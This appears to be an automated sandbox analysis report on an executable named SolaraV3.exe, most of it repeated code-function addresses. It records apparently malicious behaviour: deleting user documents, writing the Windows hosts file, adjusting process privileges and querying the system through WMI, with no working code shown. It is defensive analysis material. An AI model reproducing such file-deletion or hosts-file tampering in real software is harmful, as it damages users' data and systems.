Source: SolaraV3.exe, 00000002.00000003.1769191684.000001FC25569000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2043957200.000001FC25C1C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.zhihu.com/
Source: SolaraV3.exe, 00000002.00000003.1772675599.000001FC252A7000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2039868154.000001FC253B7000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.2036193521.000001FC252A2000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1921057827.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1708990356.000001FC25299000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1770986223.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1921552847.000001FC252A2000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2038979504.000001FC252A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://yahoo.com/
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window created: window name: CLIPBRDWNDCLASS

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\Desktop\SolaraV3.exe File deleted: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\LSBIHQFDVT.pdf
Source: C:\Users\user\Desktop\SolaraV3.exe File deleted: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\PALRGUCVEH.mp3
Source: C:\Users\user\Desktop\SolaraV3.exe File deleted: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\ZQIXMVQGAH.xlsx
Source: C:\Users\user\Desktop\SolaraV3.exe File deleted: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\QNCYCDFIJJ.xlsx
Source: C:\Users\user\Desktop\SolaraV3.exe File deleted: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\NEBFQQYWPS.docx
Source: C:\Users\user\Desktop\SolaraV3.exe File written: C:\Windows\System32\drivers\etc\hosts
Source: conhost.exe Process created: 40
Source: cmd.exe Process created: 68

System Summary

Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EE93A70: CreateFileW,CreateFileW,DeviceIoControl,CloseHandle, 110_2_00007FF74EE93A70
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EEBB57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx, 110_2_00007FF74EEBB57C
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 1_2_00007FF6DC701000 1_2_00007FF6DC701000
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 1_2_00007FF6DC7208C8 1_2_00007FF6DC7208C8
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 1_2_00007FF6DC7089E0 1_2_00007FF6DC7089E0
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 1_2_00007FF6DC726964 1_2_00007FF6DC726964
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 1_2_00007FF6DC711D54 1_2_00007FF6DC711D54
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 1_2_00007FF6DC71E570 1_2_00007FF6DC71E570
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 1_2_00007FF6DC7135A0 1_2_00007FF6DC7135A0
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 1_2_00007FF6DC71DEF0 1_2_00007FF6DC71DEF0
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 1_2_00007FF6DC729728 1_2_00007FF6DC729728
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 1_2_00007FF6DC725E7C 1_2_00007FF6DC725E7C
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 1_2_00007FF6DC719EA0 1_2_00007FF6DC719EA0
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 1_2_00007FF6DC709800 1_2_00007FF6DC709800
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 1_2_00007FF6DC711740 1_2_00007FF6DC711740
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 1_2_00007FF6DC711F60 1_2_00007FF6DC711F60
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 1_2_00007FF6DC718794 1_2_00007FF6DC718794
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 1_2_00007FF6DC7180E4 1_2_00007FF6DC7180E4
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 1_2_00007FF6DC721874 1_2_00007FF6DC721874
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 1_2_00007FF6DC7240AC 1_2_00007FF6DC7240AC
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 1_2_00007FF6DC711944 1_2_00007FF6DC711944
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 1_2_00007FF6DC712164 1_2_00007FF6DC712164
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 1_2_00007FF6DC7139A4 1_2_00007FF6DC7139A4
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 1_2_00007FF6DC70A2DB 1_2_00007FF6DC70A2DB
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 1_2_00007FF6DC71DA5C 1_2_00007FF6DC71DA5C
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 1_2_00007FF6DC725C00 1_2_00007FF6DC725C00
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 1_2_00007FF6DC712C10 1_2_00007FF6DC712C10
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 1_2_00007FF6DC723C10 1_2_00007FF6DC723C10
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 1_2_00007FF6DC726418 1_2_00007FF6DC726418
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 1_2_00007FF6DC7208C8 1_2_00007FF6DC7208C8
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 1_2_00007FF6DC711B50 1_2_00007FF6DC711B50
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 1_2_00007FF6DC715D30 1_2_00007FF6DC715D30
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 1_2_00007FF6DC70A47B 1_2_00007FF6DC70A47B
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 1_2_00007FF6DC70ACAD 1_2_00007FF6DC70ACAD
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FF6DC701000 2_2_00007FF6DC701000
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FF6DC726964 2_2_00007FF6DC726964
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FF6DC70A2DB 2_2_00007FF6DC70A2DB
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FF6DC711D54 2_2_00007FF6DC711D54
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FF6DC71E570 2_2_00007FF6DC71E570
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FF6DC7135A0 2_2_00007FF6DC7135A0
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FF6DC71DEF0 2_2_00007FF6DC71DEF0
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FF6DC729728 2_2_00007FF6DC729728
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FF6DC725E7C 2_2_00007FF6DC725E7C
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FF6DC719EA0 2_2_00007FF6DC719EA0
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FF6DC709800 2_2_00007FF6DC709800
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FF6DC711740 2_2_00007FF6DC711740
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FF6DC711F60 2_2_00007FF6DC711F60
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FF6DC718794 2_2_00007FF6DC718794
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FF6DC7208C8 2_2_00007FF6DC7208C8
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FF6DC7180E4 2_2_00007FF6DC7180E4
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FF6DC721874 2_2_00007FF6DC721874
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FF6DC7240AC 2_2_00007FF6DC7240AC
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FF6DC7089E0 2_2_00007FF6DC7089E0
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FF6DC711944 2_2_00007FF6DC711944
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FF6DC712164 2_2_00007FF6DC712164
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FF6DC7139A4 2_2_00007FF6DC7139A4
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FF6DC71DA5C 2_2_00007FF6DC71DA5C
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FF6DC725C00 2_2_00007FF6DC725C00
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FF6DC712C10 2_2_00007FF6DC712C10
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FF6DC723C10 2_2_00007FF6DC723C10
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FF6DC726418 2_2_00007FF6DC726418
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FF6DC711B50 2_2_00007FF6DC711B50
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FF6DC715D30 2_2_00007FF6DC715D30
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FF6DC70A47B 2_2_00007FF6DC70A47B
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FF6DC70ACAD 2_2_00007FF6DC70ACAD
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0BB66EE0 2_2_00007FFB0BB66EE0
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B811EA6 2_2_00007FFB0B811EA6
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B815934 2_2_00007FFB0B815934
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B814A59 2_2_00007FFB0B814A59
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B813B98 2_2_00007FFB0B813B98
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B812D79 2_2_00007FFB0B812D79
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B815D8A 2_2_00007FFB0B815D8A
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B81516E 2_2_00007FFB0B81516E
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B948960 2_2_00007FFB0B948960
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B816CBC 2_2_00007FFB0B816CBC
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B816A87 2_2_00007FFB0B816A87
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B811F9B 2_2_00007FFB0B811F9B
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B813FDF 2_2_00007FFB0B813FDF
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B81655F 2_2_00007FFB0B81655F
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B8121BC 2_2_00007FFB0B8121BC
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0BA50E00 2_2_00007FFB0BA50E00
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B8160A0 2_2_00007FFB0B8160A0
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B8122ED 2_2_00007FFB0B8122ED
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B811140 2_2_00007FFB0B811140
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B816F28 2_2_00007FFB0B816F28
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B81704A 2_2_00007FFB0B81704A
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B8C0440 2_2_00007FFB0B8C0440
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B82C480 2_2_00007FFB0B82C480
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B8172C5 2_2_00007FFB0B8172C5
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B815B14 2_2_00007FFB0B815B14
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B812C7A 2_2_00007FFB0B812C7A
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B9B4170 2_2_00007FFB0B9B4170
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B814106 2_2_00007FFB0B814106
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B815B78 2_2_00007FFB0B815B78
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B816C21 2_2_00007FFB0B816C21
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B814B5B 2_2_00007FFB0B814B5B
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B8129D2 2_2_00007FFB0B8129D2
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B82C620 2_2_00007FFB0B82C620
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B81177B 2_2_00007FFB0B81177B
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B94C660 2_2_00007FFB0B94C660
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B812144 2_2_00007FFB0B812144
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B814638 2_2_00007FFB0B814638
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B8125F4 2_2_00007FFB0B8125F4
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B8169E7 2_2_00007FFB0B8169E7
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B93DC50 2_2_00007FFB0B93DC50
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B813602 2_2_00007FFB0B813602
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B811D02 2_2_00007FFB0B811D02
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B9C99D0 2_2_00007FFB0B9C99D0
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B813A8A 2_2_00007FFB0B813A8A
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B8159FC 2_2_00007FFB0B8159FC
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B814C19 2_2_00007FFB0B814C19
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B812FD1 2_2_00007FFB0B812FD1
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B8111CC 2_2_00007FFB0B8111CC
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B812761 2_2_00007FFB0B812761
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B8122B1 2_2_00007FFB0B8122B1
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B8172AC 2_2_00007FFB0B8172AC
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B811622 2_2_00007FFB0B811622
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B81736A 2_2_00007FFB0B81736A
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B811D88 2_2_00007FFB0B811D88
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B941490 2_2_00007FFB0B941490
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B8132EC 2_2_00007FFB0B8132EC
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B81228E 2_2_00007FFB0B81228E
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B815515 2_2_00007FFB0B815515
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B81428C 2_2_00007FFB0B81428C
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B82D260 2_2_00007FFB0B82D260
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B8130C6 2_2_00007FFB0B8130C6
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B815BF5 2_2_00007FFB0B815BF5
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B835200 2_2_00007FFB0B835200
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B949130 2_2_00007FFB0B949130
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B9B50B0 2_2_00007FFB0B9B50B0
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B9C9100 2_2_00007FFB0B9C9100
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B81710D 2_2_00007FFB0B81710D
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B811424 2_2_00007FFB0B811424
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B8154D4 2_2_00007FFB0B8154D4
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B951760 2_2_00007FFB0B951760
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B814C3C 2_2_00007FFB0B814C3C
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B812E91 2_2_00007FFB0B812E91
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B814ACA 2_2_00007FFB0B814ACA
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B81504C 2_2_00007FFB0B81504C
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B81276B 2_2_00007FFB0B81276B
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B815614 2_2_00007FFB0B815614
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B811B27 2_2_00007FFB0B811B27
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B8115C8 2_2_00007FFB0B8115C8
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B8154CF 2_2_00007FFB0B8154CF
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B952C00 2_2_00007FFB0B952C00
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B813A94 2_2_00007FFB0B813A94
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B814D09 2_2_00007FFB0B814D09
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B815F10 2_2_00007FFB0B815F10
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B8123F6 2_2_00007FFB0B8123F6
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B815DA3 2_2_00007FFB0B815DA3
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B9CA900 2_2_00007FFB0B9CA900
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B8153AD 2_2_00007FFB0B8153AD
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B8144CB 2_2_00007FFB0B8144CB
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B82F060 2_2_00007FFB0B82F060
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B81638E 2_2_00007FFB0B81638E
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B9B3010 2_2_00007FFB0B9B3010
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B814F43 2_2_00007FFB0B814F43
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B812171 2_2_00007FFB0B812171
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B8153C6 2_2_00007FFB0B8153C6
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B82EF00 2_2_00007FFB0B82EF00
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B81213A 2_2_00007FFB0B81213A
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B8F2CD0 2_2_00007FFB0B8F2CD0
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B816564 2_2_00007FFB0B816564
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B811299 2_2_00007FFB0B811299
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B815434 2_2_00007FFB0B815434
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B813634 2_2_00007FFB0B813634
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B816EBF 2_2_00007FFB0B816EBF
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B811A50 2_2_00007FFB0B811A50
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B811217 2_2_00007FFB0B811217
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B812301 2_2_00007FFB0B812301
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B816D5C 2_2_00007FFB0B816D5C
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B8126EE 2_2_00007FFB0B8126EE
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B9C6100 2_2_00007FFB0B9C6100
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B814E53 2_2_00007FFB0B814E53
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B8168CA 2_2_00007FFB0B8168CA
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B9525D0 2_2_00007FFB0B9525D0
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B81144C 2_2_00007FFB0B81144C
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B93E5F0 2_2_00007FFB0B93E5F0
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B8165A0 2_2_00007FFB0B8165A0
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B814408 2_2_00007FFB0B814408
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B81318E 2_2_00007FFB0B81318E
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B816FFF 2_2_00007FFB0B816FFF
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B8110AA 2_2_00007FFB0B8110AA
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B81707C 2_2_00007FFB0B81707C
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B81416A 2_2_00007FFB0B81416A
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B813698 2_2_00007FFB0B813698
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B81348B 2_2_00007FFB0B81348B
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B82BF20 2_2_00007FFB0B82BF20
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B8160DC 2_2_00007FFB0B8160DC
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B815E25 2_2_00007FFB0B815E25
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B82BD60 2_2_00007FFB0B82BD60
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B943CC0 2_2_00007FFB0B943CC0
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B815A65 2_2_00007FFB0B815A65
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B811CC6 2_2_00007FFB0B811CC6
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B947480 2_2_00007FFB0B947480
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B812D10 2_2_00007FFB0B812D10
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B813BA7 2_2_00007FFB0B813BA7
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B812671 2_2_00007FFB0B812671
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B812987 2_2_00007FFB0B812987
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B817257 2_2_00007FFB0B817257
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B813837 2_2_00007FFB0B813837
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B816EF1 2_2_00007FFB0B816EF1
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B83B1C0 2_2_00007FFB0B83B1C0
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B82F200 2_2_00007FFB0B82F200
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B8150B0 2_2_00007FFB0B8150B0
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B81114F 2_2_00007FFB0B81114F
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B9CB0E0 2_2_00007FFB0B9CB0E0
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B8157D6 2_2_00007FFB0B8157D6
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B947780 2_2_00007FFB0B947780
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B81435E 2_2_00007FFB0B81435E
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B87F700 2_2_00007FFB0B87F700
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B813792 2_2_00007FFB0B813792
